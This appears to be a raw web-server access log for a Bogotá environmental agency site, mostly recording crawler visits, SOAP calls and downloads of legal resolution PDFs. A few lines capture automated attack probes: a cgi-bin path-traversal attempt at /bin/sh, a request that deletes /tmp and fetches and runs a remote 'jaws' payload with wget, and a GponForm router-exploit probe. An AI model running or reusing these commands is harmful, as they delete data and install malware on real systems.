186.102.48.86 - - [20/Mar/2022:13:24:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/+raYb9FdGaXrUKvfOpm5bVUKwf1aQA+SyVcMxblXFVL08SK41v78hDcWDE3k33jontLr3IPNFOMh7vHC/G9e9XVgx3ZTx/LjNTbfzlrzTaqBntVmspW6W+XVYR1AXx4z/tlA55fw1zZdVaBmCZDsXSUCbCudbTcDWENLpJSu/GBEz3Inn2ov07hqVOdwKbh1+icDLUD9cAqQNW2jyZnKUKVzDWxpnxk2d7Uknjeo+yz+KtH4/exZcMt4t55H5vB0XuMXpOC/7uaxQSO4ekscZ3hkrlpqGjbaStZEe3WEOk4TckfcaGy79sM8EohaQRUoiCHyjlMYkMVblPFhKD+Xyzt6JZiHcNn3ywRQ5nEXg7vbQPcFMVwQ1k2wIE1rXX0FSMtXx3J5AnDXg5n8WWJjvIG8I3NHICtakL8Xn74zmQsjewxbHpxkMNwugdCcvyLLfLAcNmph+uFlho23zrIf6gKDjhJnluwEET+Ztu6g8Y0PxVslxv9u9zV//4meOLQe/5moPdfip4y9tdSw+FHy5NYzvUfkCd073mRpSueHfhLsYcsWUlRQ9W5hoeNKDo+TT3BQzds7Bd357xMMLTl0SeJCniuxWrzp50t1ZjcSwYfWw/NTmMbuhMCoPPKanraR0gjPPPijwetIhqmm2W3R8/TuIyme6uRTdJJ7rcBEJolkSdghTK7WEbzAxv0su+gyNNE4i0YTS3zOzKLKxgAQFG/3b21emJlzbYhTGLrFRapko5/9qUGEshbzvGrrif8/4OnQp3MlUjH917OtQd67Q6xv860eA1WrLWDMLyZWLlLn4XOAQjq+g5UlnCrejBDGZHYZP2fJB1+Ck3rWMbbK51h8ns3ktw/GTN7qhjA4lkQGgDb/N9dCJfhwbXrJyGSlKIWGqmRJo9VHLb6N5Vvm0cftjoQOBq8cThYJA1yFsD4FMKMdDRkWWEKBGt5g1l1JiCa5FhKQiDuRz14CyYaiTVkU8jJ8u3RLU60giA7uZzJNNiidXCabz4egSfXtkR045dt4zRQHlEfrIbR1IMu7Lsc534dnQ21Efv1SQTh9QUYOkyvR1aoU7zU7YSk9dCUGhk6eQi1a3y0EWUzpB98+UGVXb3kxrNb4=&u=U2FsdGVkX1/+CSrYXgZHFuCPQa/yI3Aq9E9ZFhJVeXg=&y=U2FsdGVkX1/eMn7sxDD/YSLADqPDqL2nhXZ3PyA8nTwcg27vkDIuciyzEifxN13U HTTP/1.1" 200 1177
186.102.48.86 - - [20/Mar/2022:13:24:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/2S47zV/VLbdVWF7ATGbBXE7RuoBf8DPcTSKzm5Qy0chwaJv1x1loP&u=U2FsdGVkX1/+CSrYXgZHFuCPQa/yI3Aq9E9ZFhJVeXg=&y=U2FsdGVkX1/eMn7sxDD/YSLADqPDqL2nhXZ3PyA8nTwcg27vkDIuciyzEifxN13U HTTP/1.1" 200 70
186.102.48.86 - - [20/Mar/2022:13:24:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18QbtDF3ya5V2Cp5u6yHh7VyH+I40DO0zpDvliC7bcyBMrK2nt19jOK&u=U2FsdGVkX1/+CSrYXgZHFuCPQa/yI3Aq9E9ZFhJVeXg=&y=U2FsdGVkX1/eMn7sxDD/YSLADqPDqL2nhXZ3PyA8nTwcg27vkDIuciyzEifxN13U HTTP/1.1" 200 70
186.102.48.86 - - [20/Mar/2022:13:24:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX191t7yfkqJFxjUJxSYTzY9q9Dqcl3jjHnDWw2jDyEbUN3gGQDm+4L+e&u=U2FsdGVkX1/+CSrYXgZHFuCPQa/yI3Aq9E9ZFhJVeXg=&y=U2FsdGVkX1/eMn7sxDD/YSLADqPDqL2nhXZ3PyA8nTwcg27vkDIuciyzEifxN13U HTTP/1.1" 200 70
186.102.48.86 - - [20/Mar/2022:13:24:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/5IGK9lb4I8+2MXdGUGcwPk7U3lADP+T0Wz9F42VWE6J86AEN7Tv6T&u=U2FsdGVkX1/+CSrYXgZHFuCPQa/yI3Aq9E9ZFhJVeXg=&y=U2FsdGVkX1/eMn7sxDD/YSLADqPDqL2nhXZ3PyA8nTwcg27vkDIuciyzEifxN13U HTTP/1.1" 200 70
186.102.48.86 - - [20/Mar/2022:13:24:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/IuonQDBLLSF2612wyqu8nPAFQc5ueIJF6n+zLQitlo4qavhy8BXjPH3KWL7eGcJ7giwA7zYleHQiPzN+9bljh3bPHDaPKYZiVldCBA44BzAOoe2mh5Mv5rtzhAr26qsY/dSO+O/P4jzJ1WVqyMdmSM0UjirMeAm+jbuSTMekS15Qyu09jtjcRd4p0WvVJFHdArLeWLqV+AqVCGGtAo9o0imP+PaYrMgRUcTIHmQFkzxEN/1Q1+G/eFcqSofJraiXlx3ilW8eGoBHzHPTNQfbxspix4a6vUuf3GsdcO8SDj8dEfg2wSHnfAF6XltZ4Ho2QqQcXkAhAew==&u=U2FsdGVkX1/+CSrYXgZHFuCPQa/yI3Aq9E9ZFhJVeXg=&y=U2FsdGVkX1/eMn7sxDD/YSLADqPDqL2nhXZ3PyA8nTwcg27vkDIuciyzEifxN13U HTTP/1.1" 200 196
186.102.48.86 - - [20/Mar/2022:13:24:52 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+2rg3zKbMXA8lIRBtxM4a6hwkX+p4+ATGq1Q+YvOpAILGmLQ7RrsEZ HTTP/1.1" 200 30975
207.46.13.157 - - [20/Mar/2022:13:25:59 -0500] "GET /bla/resoluciones/resoluciones%202014/1031.pdf HTTP/1.1" 200 800520
216.245.221.92 - - [20/Mar/2022:13:26:14 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.192 - - [20/Mar/2022:13:26:29 -0500] "GET /portaldeninos/humedal-la-vaca-2/ HTTP/1.1" 200 80416
190.156.90.221 - - [20/Mar/2022:13:27:15 -0500] "GET /BLA/ HTTP/1.1" 200 538
190.156.90.221 - - [20/Mar/2022:13:27:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
190.156.90.221 - - [20/Mar/2022:13:27:21 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.156.90.221 - - [20/Mar/2022:13:27:23 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
190.156.90.221 - - [20/Mar/2022:13:27:17 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 16331
201.245.192.253 - - [20/Mar/2022:13:30:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43921
201.245.192.253 - - [20/Mar/2022:13:31:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [20/Mar/2022:13:31:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:13:31:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45344
45.146.165.37 - - [20/Mar/2022:13:32:27 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
31.13.127.29 - - [20/Mar/2022:13:34:09 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html?fbclid=IwAR03BE_ktnzV-uhrzZdsmuCrdhSzZhRW0IrkRfEQwW42rWDmHRjcwgLZa7g HTTP/1.1" 200 911
201.245.192.253 - - [20/Mar/2022:13:34:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114600
216.245.221.92 - - [20/Mar/2022:13:36:14 -0500] "HEAD / HTTP/1.1" 200 -
191.95.136.68 - - [20/Mar/2022:13:36:34 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [20/Mar/2022:13:40:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43921
216.245.221.92 - - [20/Mar/2022:13:41:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:13:41:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45344
201.245.192.253 - - [20/Mar/2022:13:41:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114600
66.249.73.127 - - [20/Mar/2022:13:44:32 -0500] "-" 408 -
216.245.221.92 - - [20/Mar/2022:13:46:14 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [20/Mar/2022:13:49:10 -0500] "GET /bla/resoluciones/resoluciones%202014/2103.pdf HTTP/1.1" 200 510976
186.114.114.8 - - [20/Mar/2022:13:50:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1256.pdf HTTP/1.1" 200 375907
216.245.221.92 - - [20/Mar/2022:13:51:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:13:52:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114600
186.114.114.8 - - [20/Mar/2022:13:53:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1231.pdf HTTP/1.1" 200 386461
66.249.73.127 - - [20/Mar/2022:13:55:12 -0500] "-" 408 -
216.245.221.92 - - [20/Mar/2022:13:56:14 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:14:00:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1202.pdf HTTP/1.1" 200 628138
207.46.13.209 - - [20/Mar/2022:14:00:32 -0500] "GET /BLA/resoluciones/AUTOS%202014/3624.pdf HTTP/1.1" 304 -
216.245.221.92 - - [20/Mar/2022:14:01:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [20/Mar/2022:14:02:16 -0500] "GET /bla/resoluciones/resoluciones%202014/3290.pdf HTTP/1.1" 200 452098
91.211.89.243 - - [20/Mar/2022:14:03:53 -0500] "GET / HTTP/1.1" 200 319
186.114.114.8 - - [20/Mar/2022:14:05:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1079.pdf HTTP/1.1" 200 562958
201.245.192.253 - - [20/Mar/2022:14:04:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
157.55.39.218 - - [20/Mar/2022:14:06:03 -0500] "GET /bla/resoluciones/resoluciones%202014/0385.pdf HTTP/1.1" 200 518299
216.245.221.92 - - [20/Mar/2022:14:06:14 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:14:09:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2017%2F HTTP/1.1" 200 277135
186.114.114.8 - - [20/Mar/2022:14:09:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0010.pdf HTTP/1.1" 200 1066692
66.249.73.127 - - [20/Mar/2022:14:09:33 -0500] "-" 408 -
45.146.165.37 - - [20/Mar/2022:14:09:56 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [20/Mar/2022:14:11:14 -0500] "HEAD / HTTP/1.1" 200 -
156.217.51.28 - - [20/Mar/2022:14:12:40 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
186.114.114.8 - - [20/Mar/2022:14:13:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0095.pdf HTTP/1.1" 200 512274
201.245.192.253 - - [20/Mar/2022:14:14:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114610
186.114.114.8 - - [20/Mar/2022:14:16:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0834.pdf HTTP/1.1" 200 506926
216.245.221.92 - - [20/Mar/2022:14:16:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:14:20:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43617
216.245.221.92 - - [20/Mar/2022:14:21:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [20/Mar/2022:14:21:50 -0500] "GET /bla/resoluciones/resoluciones%202014/1157.pdf HTTP/1.1" 200 650342
201.245.192.253 - - [20/Mar/2022:14:21:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45354
207.46.13.209 - - [20/Mar/2022:14:23:04 -0500] "GET /bla/resoluciones/resoluciones%202014/0988.pdf HTTP/1.1" 200 877341
216.245.221.92 - - [20/Mar/2022:14:26:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:14:26:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114610
66.249.73.97 - - [20/Mar/2022:14:28:20 -0500] "-" 408 -
186.114.114.8 - - [20/Mar/2022:14:30:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0819.pdf HTTP/1.1" 200 317450
207.46.13.179 - - [20/Mar/2022:14:30:48 -0500] "GET /bla/resoluciones/resoluciones%202014/0286.pdf HTTP/1.1" 200 215868
173.252.87.11 - - [20/Mar/2022:14:30:56 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
201.245.192.253 - - [20/Mar/2022:14:30:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43617
216.245.221.92 - - [20/Mar/2022:14:31:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:14:31:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45354
201.245.192.253 - - [20/Mar/2022:14:32:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114610
186.114.114.8 - - [20/Mar/2022:14:33:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0080.pdf HTTP/1.1" 200 492222
186.114.114.8 - - [20/Mar/2022:14:33:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0076.pdf HTTP/1.1" 200 372118
216.245.221.92 - - [20/Mar/2022:14:36:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:14:36:55 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
186.114.114.8 - - [20/Mar/2022:14:37:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8131.pdf HTTP/1.1" 200 736809
186.114.114.8 - - [20/Mar/2022:14:39:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 258002
186.114.114.8 - - [20/Mar/2022:14:39:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0076.pdf HTTP/1.1" 200 382043
186.114.114.8 - - [20/Mar/2022:14:40:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0708.pdf HTTP/1.1" 200 323443
201.245.192.253 - - [20/Mar/2022:14:40:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43617
216.245.221.92 - - [20/Mar/2022:14:41:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:14:41:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45354
201.245.192.253 - - [20/Mar/2022:14:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114610
181.237.162.52 - - [20/Mar/2022:14:42:56 -0500] "GET /forest/ HTTP/1.1" 200 12041
181.237.162.52 - - [20/Mar/2022:14:43:02 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
186.28.189.55 - - [20/Mar/2022:14:43:24 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.189.55 - - [20/Mar/2022:14:43:38 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
186.28.189.55 - - [20/Mar/2022:14:44:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3104.pdf HTTP/1.1" 200 650800
207.46.13.209 - - [20/Mar/2022:14:45:37 -0500] "GET /bla/resoluciones/notificaciones/registros%202015/2079.doc HTTP/1.1" 200 201728
216.245.221.92 - - [20/Mar/2022:14:46:13 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [20/Mar/2022:14:49:07 -0500] "GET /bla/resoluciones/resoluciones%202014/0699.pdf HTTP/1.1" 200 213149
216.245.221.92 - - [20/Mar/2022:14:51:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [20/Mar/2022:14:51:56 -0500] "GET /IsolucionSDA/bancoconocimiento/I/IngresoyCatalogaciondelMaterialBibliograficodelCentrodeDocumentacion_v2/IngresoyCatalogaciondelMaterialBibliograficodelCentrodeDocumentacion_v2.asp?IdArticulo=695 HTTP/1.1" 404 5380
201.245.192.253 - - [20/Mar/2022:14:52:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114610
34.91.173.108 - - [20/Mar/2022:14:53:53 -0500] "GET / HTTP/1.1" 200 319
186.114.114.8 - - [20/Mar/2022:14:53:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4223.pdf HTTP/1.1" 200 651591
190.130.88.205 - - [20/Mar/2022:14:54:48 -0500] "GET /sipse/faces/faces/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
190.130.88.205 - - [20/Mar/2022:14:54:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
190.130.88.205 - - [20/Mar/2022:14:54:49 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
40.77.167.61 - - [20/Mar/2022:14:55:25 -0500] "GET / HTTP/1.1" 200 319
40.77.167.46 - - [20/Mar/2022:14:56:01 -0500] "GET /bla/resoluciones/resoluciones%202014/2614.pdf HTTP/1.1" 200 432681
216.245.221.92 - - [20/Mar/2022:14:56:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [20/Mar/2022:14:56:30 -0500] "GET /bla/resoluciones/notificaciones/registros%202015/1068.doc HTTP/1.1" 200 203776
216.245.221.92 - - [20/Mar/2022:15:01:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:15:01:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114610
40.77.139.52 - - [20/Mar/2022:15:04:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [20/Mar/2022:15:06:13 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [20/Mar/2022:15:06:37 -0500] "GET /bla/resoluciones/resoluciones%202014/0699.pdf HTTP/1.1" 200 213149
217.182.171.12 - - [20/Mar/2022:15:09:56 -0500] "HEAD /BLA/resoluciones/AUTOS%202017/1431.pdf HTTP/1.1" 200 -
216.245.221.92 - - [20/Mar/2022:15:11:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [20/Mar/2022:15:11:21 -0500] "GET /bla/resoluciones/resoluciones%202014/2788.pdf HTTP/1.1" 200 618561
201.245.192.253 - - [20/Mar/2022:15:11:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114609
192.241.224.234 - - [20/Mar/2022:15:14:29 -0500] "MGLNDD_190.27.245.106_80" 501 953
115.59.220.212 - - [20/Mar/2022:15:15:16 -0500] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 1013
216.245.221.92 - - [20/Mar/2022:15:16:13 -0500] "HEAD / HTTP/1.1" 200 -
66.220.149.16 - - [20/Mar/2022:15:17:41 -0500] "GET /images/acuerdos-enero-19.jpg HTTP/1.1" 200 56694
207.46.13.157 - - [20/Mar/2022:15:18:28 -0500] "GET /bla/resoluciones/resoluciones%202014/0674.pdf HTTP/1.1" 200 2795802
181.237.162.52 - - [20/Mar/2022:15:19:22 -0500] "GET /forest/ HTTP/1.1" 200 12041
181.237.162.52 - - [20/Mar/2022:15:19:31 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
207.46.13.179 - - [20/Mar/2022:15:20:33 -0500] "GET /bla/resoluciones/resoluciones%202014/2587.pdf HTTP/1.1" 200 837684
201.245.192.253 - - [20/Mar/2022:15:20:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45946
216.245.221.92 - - [20/Mar/2022:15:21:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:15:21:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45353
201.245.192.253 - - [20/Mar/2022:15:23:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114609
216.245.221.92 - - [20/Mar/2022:15:26:13 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.46 - - [20/Mar/2022:15:27:31 -0500] "GET /bla/resoluciones/resoluciones%202014/1448.pdf HTTP/1.1" 200 437347
186.28.189.55 - - [20/Mar/2022:15:29:40 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.189.55 - - [20/Mar/2022:15:29:48 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 258002
201.245.192.253 - - [20/Mar/2022:15:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45946
216.245.221.92 - - [20/Mar/2022:15:31:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:15:31:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45353
157.55.39.218 - - [20/Mar/2022:15:33:11 -0500] "GET /bla/resoluciones/resoluciones%202014/1366.pdf HTTP/1.1" 200 571206
157.55.39.218 - - [20/Mar/2022:15:33:13 -0500] "GET /bla/resoluciones/resoluciones%202014/2840.pdf HTTP/1.1" 200 329439
201.245.192.253 - - [20/Mar/2022:15:32:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114609
207.46.13.179 - - [20/Mar/2022:15:34:44 -0500] "GET /bla/boletinlegal/notificaciones.php HTTP/1.1" 200 3726
157.55.39.218 - - [20/Mar/2022:15:34:51 -0500] "GET /bla/resoluciones/resoluciones%202014/2840.pdf HTTP/1.1" 200 329439
186.114.114.8 - - [20/Mar/2022:15:35:50 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.114.114.8 - - [20/Mar/2022:15:36:00 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.114.114.8 - - [20/Mar/2022:15:36:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 258002
216.245.221.92 - - [20/Mar/2022:15:36:13 -0500] "HEAD / HTTP/1.1" 200 -
17.121.112.47 - - [20/Mar/2022:15:36:34 -0500] "-" 408 -
39.153.251.112 - - [20/Mar/2022:15:36:58 -0500] "GET / HTTP/1.1" 200 319
186.114.114.8 - - [20/Mar/2022:15:37:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0040.pdf HTTP/1.1" 200 355991
186.102.4.28 - - [20/Mar/2022:15:37:55 -0500] "GET /este-18-y-19-de-marzo-la-ciudadania-puede-participar-en-la-feria-de-servicios-ambientales-en-barrios-unidos.html HTTP/1.1" 200 1120
186.28.189.55 - - [20/Mar/2022:15:38:13 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.189.55 - - [20/Mar/2022:15:38:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
186.28.189.55 - - [20/Mar/2022:15:38:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
207.46.13.157 - - [20/Mar/2022:15:38:21 -0500] "GET /bla/resoluciones/autos%202018/1951.pdf HTTP/1.1" 200 267963
186.28.189.55 - - [20/Mar/2022:15:38:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3110.pdf HTTP/1.1" 200 514354
181.138.182.222 - - [20/Mar/2022:15:39:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.114.114.8 - - [20/Mar/2022:15:39:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3650.pdf HTTP/1.1" 200 428921
157.55.39.218 - - [20/Mar/2022:15:40:31 -0500] "GET /bla/resoluciones/resoluciones%202021/2401.pdf HTTP/1.1" 200 755148
201.245.192.253 - - [20/Mar/2022:15:40:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45946
216.245.221.92 - - [20/Mar/2022:15:41:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:15:41:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45353
186.80.52.27 - - [20/Mar/2022:15:42:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [20/Mar/2022:15:42:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114609
66.249.73.97 - - [20/Mar/2022:15:43:22 -0500] "-" 408 -
207.46.13.209 - - [20/Mar/2022:15:43:53 -0500] "GET /transparencia/financiera? HTTP/1.1" 301 256
207.46.13.209 - - [20/Mar/2022:15:44:02 -0500] "GET /transparencia/financiera/? HTTP/1.1" 200 60557
216.245.221.92 - - [20/Mar/2022:15:46:13 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.46 - - [20/Mar/2022:15:47:54 -0500] "GET /bla/resoluciones/resoluciones%202014/1367.pdf HTTP/1.1" 200 918185
66.249.73.127 - - [20/Mar/2022:15:50:05 -0500] "-" 408 -
186.114.114.8 - - [20/Mar/2022:15:51:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3576.pdf HTTP/1.1" 200 350972
216.245.221.92 - - [20/Mar/2022:15:51:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:15:52:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114609
217.182.171.12 - - [20/Mar/2022:15:53:27 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202014/1926.pdf HTTP/1.1" 200 -
5.188.210.227 - - [20/Mar/2022:15:53:34 -0500] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 1151
40.77.167.46 - - [20/Mar/2022:15:54:04 -0500] "GET /bla/resoluciones/resoluciones%202021/1249.pdf HTTP/1.1" 200 1206108
181.147.225.79 - - [20/Mar/2022:15:54:15 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.147.225.79 - - [20/Mar/2022:15:54:15 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.147.225.79 - - [20/Mar/2022:15:54:15 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
40.77.167.46 - - [20/Mar/2022:15:55:25 -0500] "GET /bla/resoluciones/resoluciones%202014/1678.pdf HTTP/1.1" 200 570545
207.46.13.43 - - [20/Mar/2022:15:55:49 -0500] "GET /IsolucionSDA/bancoconocimiento/I/IngresoyEgresodeBienesdelAlmacen_v2/IngresoyEgresodeBienesdelAlmacen_v2.asp?IdArticulo=518 HTTP/1.1" 404 5236
207.46.13.209 - - [20/Mar/2022:15:56:13 -0500] "GET /bla/resoluciones/autos%202018/6477.pdf HTTP/1.1" 200 325906
216.245.221.92 - - [20/Mar/2022:15:56:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:15:57:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0296.pdf HTTP/1.1" 200 391607
186.114.114.8 - - [20/Mar/2022:15:59:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2729.pdf HTTP/1.1" 200 357923
201.221.172.69 - - [20/Mar/2022:15:59:18 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
216.245.221.92 - - [20/Mar/2022:16:01:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:16:01:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2628.pdf HTTP/1.1" 200 381145
207.46.13.43 - - [20/Mar/2022:16:02:20 -0500] "GET /bla/resoluciones/resoluciones%202021/3106.pdf HTTP/1.1" 200 344288
201.245.192.253 - - [20/Mar/2022:16:02:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
201.221.172.69 - - [20/Mar/2022:16:03:57 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
181.237.162.52 - - [20/Mar/2022:16:05:32 -0500] "GET /forest/ HTTP/1.1" 200 12041
186.114.114.8 - - [20/Mar/2022:16:05:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2476.pdf HTTP/1.1" 200 394710
181.237.162.52 - - [20/Mar/2022:16:05:40 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
216.245.221.92 - - [20/Mar/2022:16:06:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:16:06:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2373.pdf HTTP/1.1" 200 451618
